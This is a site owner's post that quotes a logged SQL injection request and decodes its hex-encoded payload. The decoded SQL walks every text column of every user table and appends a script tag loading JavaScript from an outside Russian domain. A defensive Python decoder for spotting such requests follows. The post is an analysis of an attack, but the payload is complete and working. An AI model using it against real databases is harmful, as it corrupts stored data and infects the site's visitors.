Another Bad Person Looking for Trouble?

I found an odd looking request in my log files:

  "/default.asp?guid=road_to_the_derby200303110002;
  declare%20@s%20varchar(4000);set%20@s=cast(0x4465434c 
  417265204054207641726368415228323535292c4063205641 
  52436861522832353529204445634c415245207461426c655f 
  637552736f7220635552734f5220466f722073654c65637420 
  412e4e414d652c622e4e614d452066724f6d207379736f624a 
  4543747320612c735973634f6c756d4e732062207768455265 
  20412e69643d422e496420616e4420412e58747950653d2755 
  2720616e642028622e78745970453d3939206f5220622e7854 
  5970653d3335204f7220622e78745970653d323331204f5220 
  422e78547950653d31363729204f70654e205441424c455f43 
  7572736f52204665546368204e4578542046524f6d20744162 
  6c655f435572736f7220494e546f2040542c4063207748496c 
  6528404046457443485f7354615455733d302920624567696e 
  20657845632827557064617445205b272b40742b275d205365 
  54205b272b40432b275d3d727472494d28436f4e7645725428 
  766152436841522834303030292c5b272b40432b275d29292b 
  63617354283078334337333633373236393730373432303733 
  37323633334436383734373437303341324632463737373737 
  37324536393645363436353738364137333245373237353246 
  37303631363736353245364137333345334332463733363337 
  32363937303734334520415320764152436861722835322929 
  2729206645746368204e4578742066726f4d205441626c655f 
  635552736f7220696e744f2040742c404320654e6420434c6f 
  5345205461624c655f437552734f72204445614c6c6f436174 
  65207441626c655f435572736f7220%20as%20varchar(4000 ));exec(@s);--
  

The seemingly meaningless numbers are hexadecimal code. Using http://www.string-functions.com/hex-string.aspx, I converted the hex code into this string:

  /default.asp?guid=road_to_the_derby200303110002;declare%20@s%20varchar(4000);set%20@s=
DeCLAre @T vArchAR(255),@c VARChaR(255) 
DEcLARE taBle_cuRsor cURsOR For seLect A.NAMe,b.NaME frOm sysobJECts a,sYscOlumNs b 
whERe A.id=B.Id anD A.XtyPe='U' and (b.xtYpE=99 oR b.xTYpe=35 Or b.xtYpe=231 OR B.xTyPe=167) 
OpeN TABLE_CursoR FeTch NExT FROm tAble_CUrsor INTo @T,@c wHIle(@@FEtCH_sTaTUs=0) 
bEgin exEc('UpdatE ['+@t+'] SeT ['+@C+']=rtrIM(CoNvErT(vaRChAR(4000),['+@C+']))+
casT(0x3C736372697074207372633D687474703A2F2F7777772E696E6465786A732E72752F706167652E6A733E3C2F7363726970743E AS vARChar(52))
') fEtch NExt froM TAble_cURsor intO @t,@C eNd CLoSE TabLe_CuRsOr DEaLloCate tAble_CUrsor
%20as%20varchar(4000));exec(@s);--

It looks like they were poking around for a SQL Server instance on the box and trying to make it run a .js page (currently removed from www.indexjs.ru). What do you think they were up to? I wonder what would have happened if my web server did have a SQL Server instance running on the same machine (which I don't think it does) and if that .js page had run?
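The decoding done above with a web tool, as an added example that is not part of the original post: a small Python decoder that URL-decodes a logged request path, expands 0x... literals (recursively, so a second literal nested inside the first, like the one carrying the script tag here, is revealed too) and flags the keyword combination this payload relies on. The request it runs on is constructed here in the same shape as the logged one, with a placeholder domain.

```python
import re
from urllib.parse import unquote

# A hex literal as SQL Server writes it: 0x followed by hex digits.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})")

# Keywords that together characterise the cursor-driven mass UPDATE in the post.
# Matched case-insensitively: the attacker mixed case to slip past naive filters.
INDICATORS = ("declare", "cursor", "sysobjects", "syscolumns",
              "update", "exec", "<script")

def decode_hex_literals(text: str, depth: int = 0, max_depth: int = 3) -> str:
    """Replace each 0x... literal with its decoded text, recursing into the result
    so a literal hidden inside another literal (the <script> tag here) shows up too."""
    if depth >= max_depth:
        return text

    def _sub(m):
        try:
            decoded = bytes.fromhex(m.group(1)).decode("latin-1")
        except ValueError:  # odd length: not a whole literal, keep it as-is
            return m.group(0)
        return decode_hex_literals(decoded, depth + 1, max_depth)

    return HEX_LITERAL.sub(_sub, text)


def analyse_request(path: str) -> dict:
    """URL-decode a logged request path, expand hex-encoded SQL, list indicators found."""
    revealed = decode_hex_literals(unquote(path))
    low = revealed.lower()
    found = [k for k in INDICATORS if k in low]
    return {"decoded": revealed, "indicators": found, "suspicious": len(found) >= 3}

# Constructed sample in the shape of the logged request (not the real log line):
# the inner SQL hides a <script> tag in a second hex literal; the domain is a placeholder.
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE table_cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='U' and b.xtype=231 "
    "exec('UPDATE ['+@T+'] SET ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+cast(0x"
    + "<script src=http://js.example.invalid/p.js></script>".encode().hex()
    + " as varchar(52))')"
)
SAMPLE_REQUEST = ("/default.asp?guid=x;declare%20@s%20varchar(4000);set%20@s=cast(0x"
                  + INNER_SQL.encode().hex() + "%20as%20varchar(4000));exec(@s);--")

if __name__ == "__main__":
    print(analyse_request(SAMPLE_REQUEST))
```

Run against a real IIS log, feed each request path to analyse_request and review the entries marked suspicious; the decoded text shows what the injected SQL would have written into every text column of every user table.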
